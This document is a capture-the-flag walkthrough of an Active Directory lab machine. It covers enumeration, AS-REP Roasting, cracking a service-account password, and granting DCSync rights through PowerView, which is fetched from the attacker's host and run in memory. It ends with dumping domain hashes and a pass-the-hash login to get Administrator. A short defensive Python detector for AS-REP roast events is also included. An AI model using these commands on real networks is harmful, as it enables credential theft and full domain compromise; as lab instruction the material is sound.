Service overview

The machine was assigned the IP address 10.10.10.161. Let's run a standard reconnaissance scan with nmap:

$ nmap -sV -sC -Pn -p1-65535 -oN 10.10.10.161 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 11:54 EDT
Nmap scan report for 10.10.10.161
Host is up (0.16s latency).
Not shown: 65511 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-10 16:10:06Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49706/tcp open  msrpc        Microsoft Windows RPC
49945/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-08-10T09:10:59-07:00
| smb2-time: 
|   date: 2023-08-10T16:11:01
|_  start_date: 2023-08-10T06:25:35
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 568.04 seconds

Note the large number of Active Directory services and the domain htb.local. We can pull some information with the following command, but I won't include the listing here (it is too large).

ldapsearch -H ldap://10.10.10.161 -x -b "dc=htb,dc=local"

Let's enumerate accounts with impacket-samrdump:

$ impacket-samrdump 10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Retrieving endpoint list from 10.10.10.161
Found domain(s):
 . HTB
 . Builtin
[*] Looking up users in domain HTB
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: DefaultAccount, uid = 503
Found user: $331000-VK4ADACQNUCA, uid = 1123
Found user: SM_2c8eef0a09b545acb, uid = 1124
Found user: SM_ca8c2ed5bdab4dc9b, uid = 1125
Found user: SM_75a538d3025e4db9a, uid = 1126
Found user: SM_681f53d4942840e18, uid = 1127
Found user: SM_1b41c9286325456bb, uid = 1128
Found user: SM_9b69f1b9d2cc45549, uid = 1129
Found user: SM_7c96b981967141ebb, uid = 1130
Found user: SM_c75ee099d0a64c91b, uid = 1131
Found user: SM_1ffab36a2f5f479cb, uid = 1132
Found user: HealthMailboxc3d7722, uid = 1134
Found user: HealthMailboxfc9daad, uid = 1135
Found user: HealthMailboxc0a90c9, uid = 1136
Found user: HealthMailbox670628e, uid = 1137
Found user: HealthMailbox968e74d, uid = 1138
Found user: HealthMailbox6ded678, uid = 1139
Found user: HealthMailbox83d6781, uid = 1140
Found user: HealthMailboxfd87238, uid = 1141
Found user: HealthMailboxb01ac64, uid = 1142
Found user: HealthMailbox7108a4e, uid = 1143
Found user: HealthMailbox0659cc1, uid = 1144
Found user: sebastien, uid = 1145
Found user: lucinda, uid = 1146
Found user: svc-alfresco, uid = 1147
Found user: andy, uid = 1150
Found user: mark, uid = 1151
Found user: santi, uid = 1152
Found user: malsius, uid = 9601
...

Save the account names to a file users.txt:

Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
malsius

Using Metasploit, check which of these accounts do not require Kerberos pre-authentication (the precondition for AS-REP Roasting):

$ msfconsole
msf> use auxiliary/gather/kerberos_enumusers
msf6 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.161
msf6 auxiliary(gather/kerberos_enumusers) > set domain htb.local
msf6 auxiliary(gather/kerberos_enumusers) > set user_file ./users.txt
msf6 auxiliary(gather/kerberos_enumusers) > run

Metasploit confirms that pre-authentication is not required on the svc-alfresco account.


Save the hash to hash.txt and crack it with hashcat (AS-REP Roasting, mode 18200):

$ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
svc-alfresco:s3rvice
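From the defender's side, the AS-REP request that produced this hash is logged on the domain controller as Security event 4768 with Pre-Authentication Type 0 and RC4 (0x17) ticket encryption. The following Python is an added example, not part of the original writeup; it runs that check over constructed sample records (the field names follow the 4768 schema, the events themselves are made up):

```python
# Added example (not from the original writeup): flag AS-REP Roasting
# candidates in Windows Security event 4768 (Kerberos TGT requested).
# Events are constructed dicts carrying the 4768 fields used here.

# From the 4768 event schema:
#   PreAuthType "0"            -> TGT requested without pre-authentication
#   TicketEncryptionType 0x17  -> RC4-HMAC, the form hashcat mode 18200 cracks
#   Status 0x0                 -> the KDC actually issued the ticket
NO_PREAUTH = "0"
RC4_HMAC = "0x17"
KDC_SUCCESS = "0x0"

def is_asrep_roast_candidate(event):
    """True when a 4768 record looks like a harvested AS-REP hash."""
    if event.get("EventID") != 4768:
        return False
    user = event.get("TargetUserName", "")
    if user.endswith("$"):
        return False  # machine accounts: not what roasting tools target
    return (event.get("PreAuthType") == NO_PREAUTH
            and event.get("TicketEncryptionType") == RC4_HMAC
            and event.get("Status") == KDC_SUCCESS)

def find_roasted_accounts(events):
    """Distinct matching user names, in order of first appearance."""
    hits = []
    for ev in events:
        if is_asrep_roast_candidate(ev):
            user = ev["TargetUserName"].lower()
            if user not in hits:
                hits.append(user)
    return hits

# Constructed sample records modelled on the scan above (not real DC logs).
# Last record: status 0x19 (KDC_ERR_PREAUTH_REQUIRED) means no hash was issued.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "sebastien", "IpAddress": "10.10.16.61",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "IpAddress": "10.10.16.61",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "FOREST$", "IpAddress": "10.10.10.161",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "andy", "IpAddress": "10.10.16.61",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x19"},
]

if __name__ == "__main__":
    for user in find_roasted_accounts(SAMPLE_EVENTS):
        print(f"possible AS-REP roast of {user}")
```

Pairing this with a periodic LDAP audit of accounts carrying the DONT_REQ_PREAUTH flag closes the gap before anyone requests the ticket.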

Use evil-winrm to get a shell with the recovered credentials.

$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco

User flag

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\desktop> dir

    Directory: C:\Users\svc-alfresco\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/9/2023  11:26 PM             34 user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\desktop> type user.txt
0982d5458fac26c8cb209b44d933fde5


Privilege escalation

Let's use bloodhound-python. We need to find the shortest path to high-value accounts through the Exchange Windows Permissions rights.

bloodhound-python -d htb.local -usvc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

Create a user john and add him to the Exchange Windows Permissions group.

PS> net user john abc123! /add /domain
PS> net group "Exchange Windows Permissions" john /add
PS> net localgroup "Remote Management Users" john /add

Add the svc-alfresco account to the Exchange Windows Permissions group as well.

PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.

Next, perform a DCSync attack (Active Directory replication).

# download PowerView and serve it over HTTP
$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
$ python3 -m http.server 8080

On the remote machine, as svc-alfresco:

PS> iex(new-object net.webclient).downloadstring("http://10.10.16.61:8080/PowerView.ps1")
PS> $pass = convertto-securestring 'abc123!' -asplain -force
PS> $cred = new-object system.management.automation.pscredential('htb\john', $pass)
PS> Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync

Now dump the hashes:

$ impacket-secretsdump htb/[email protected]
abc123!


We're interested in the hash for htb.local\Administrator => aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6.

Now we can log in using Pass-the-Hash.

impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6


Root flag

C:\Windows\system32> cd \users\administrator\desktop
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 61F2-A88F

 Directory of C:\Users\Administrator\Desktop

09/23/2019  02:15 PM    <DIR>          .
09/23/2019  02:15 PM    <DIR>          ..
08/09/2023  11:26 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  10,374,438,912 bytes free

C:\Users\Administrator\Desktop> type root.txt
3943522b871a670aa7210efb6f98c92f
